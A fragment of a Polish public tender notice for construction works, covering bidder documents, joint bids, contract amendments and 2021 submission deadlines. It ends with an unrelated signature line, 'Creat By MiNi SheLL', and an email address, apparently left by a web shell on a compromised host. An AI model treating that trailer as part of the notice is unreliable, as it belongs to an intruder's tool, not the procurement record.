Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu – załącznik nr 1 do SWZ.<br/> Oświadczenie wykonawcy dotyczące przesłanek wykluczenia z postępowania – załącznik nr 2 do SWZ.<br/>Wycenę ofertową na załączniku nr 1 A i/lub 1 B do Formularza oferty, sporządzony zgodnie z dostarczonymi przedmiarami robót z cenami jednostkowymi, wartością pozycji bez podatku VAT, kwotą podatku VAT lub oświadczenie wykonawcy o zwolnieniu z podatku VAT<br/>Uwaga: Stosowanie się do katalogów KNR, KNNR i innych nie jest obowiązujące<br/>Pełnomocnictwo do reprezentowania Wykonawców w przedmiotowym postępowaniu o zamówienie publiczne albo reprezentowania Wykonawców w postępowaniu jw. i zawarcia umowy w sprawie przedmiotowego zamówienia, w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/>Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.<br/>Zobowiązanie podmiotu udostepniającego zasoby (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia – warunki<br/>określone w pkt 6.2 SWZ winni spełniać łącznie, za wyjątkiem przypadku wymienionego w pkt<br/>6.2.4.1 SWZ<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>W przypadku, o którym mowa w pkt.6.6 SWZ, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w pkt 7 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza następujące zmiany umowy dotyczące:<br/>1. Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie za zgodą obu<br/>Stron w formie pisemnej, w postaci aneksu, pod rygorem nieważności takich zmian.<br/>2. Niedopuszczalne są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty<br/>na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem ust. 3.<br/>3. Zmiana umowy, w zakresie terminu wykonania, może być dokonana w przypadku zaistnienia<br/>okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności<br/>z powodu:<br/>1) istotnych braków lub błędów w dokumentacji, również tych polegających na niezgodności<br/>dokumentacji z przepisami prawa,<br/>2) w przypadku konieczności wykonania dodatkowych badań i ekspertyz wynikłych w trakcie<br/>realizacji robót budowlanych, których nie można było przewidzieć przed przystąpieniem do prac,<br/>3) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia<br/>proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla<br/>Zamawiającego,<br/>4) z powodu działań osób trzecich (w tym organów administracji, osób indywidualnych)<br/>uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek<br/>ze stron,<br/>5) w przypadku występowania warunków atmosferycznych uniemożliwiających lub znacznie<br/>utrudniających realizację zamówienia zgodnie z warunkami określonymi w Specyfikacji<br/>Technicznej Wykonania i Odbioru Robót,<br/>6) wydłużenia terminów dostaw materiałów, nie wynikającego z okoliczności zależnych od<br/>wykonawcy ponad 14 dni w stosunku do zobowiązań dostawców materiałów – o okres<br/>wydłużenia terminów dostaw materiałów,<br/>7) okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki<br/>zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego<br/>bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych<br/>rozmiarach, to jest m. in. klęski żywiołowej (huragany, powodzie, trzęsienie ziemi), ogłoszenie<br/>stanu epidemii, pandemii, stanu nadzwyczajnego,<br/>8) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację przedmiotu zamówienia lub świadczenia jednej lub obu stron.<br/>4. Umowa może być zmieniona w stosunku do złożonej oferty w stosunku do osób realizujących<br/>zamówienie na niżej wymienionych warunkach:<br/>1) zmiana Podwykonawcy lub dalszego Podwykonawcy, przy pomocy którego Wykonawca<br/>wykonuje przedmiot umowy po wcześniejszej pisemnej informacji,<br/>2) wykonania zamówienia przy pomocy Podwykonawców, pomimo niewskazania<br/>w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w ramach<br/>Podwykonawstwa,<br/>3) rozszerzenie zakresu Podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,<br/>o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu<br/>umowy lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SWZ,<br/>4) w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego,<br/>5) zmiany nie istotnych dla wykonania przedmiotu umowy w terminie i koszcie - Wykonawca powiadomi pisemnie Zamawiającego. Takie zmiany nie wymagają sporządzenia aneksu do umowy,<br/>Zamawiający dopuszcza zmiany umowy w pozostałych wypadkach określonych w przepisie art. 455 ustawy Prawo zamówień publicznych. Wszelkie spory mogące wynikać w związku z realizacją niniejszej umowy będą rozstrzygane przez sąd miejscowo właściwy dla siedziby Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na mini Portalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ust.1 ustawy złożenia w odniesieniu do tych podmiotów podmiotowych środków dowodowych wymienionych w pkt. 7.6.2 SWZ, wymaganych od<br/>wykonawcy.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast dokumentu, o których mowa w pkt.7.6.2 SWZ, składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa<br/>w pkt 7.6.2 SWZ, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez<br/>zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 7.6.3 SWZ<br/>wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy dane umożliwiające dostęp do tych środków.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>W zakresie nieuregulowanym ustawą lub SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia<br/>Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz.U. 2020 poz.2415) oraz rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.2020<br/>poz.2452).

Creat By MiNi SheLL
Email: jattceo@gmail.com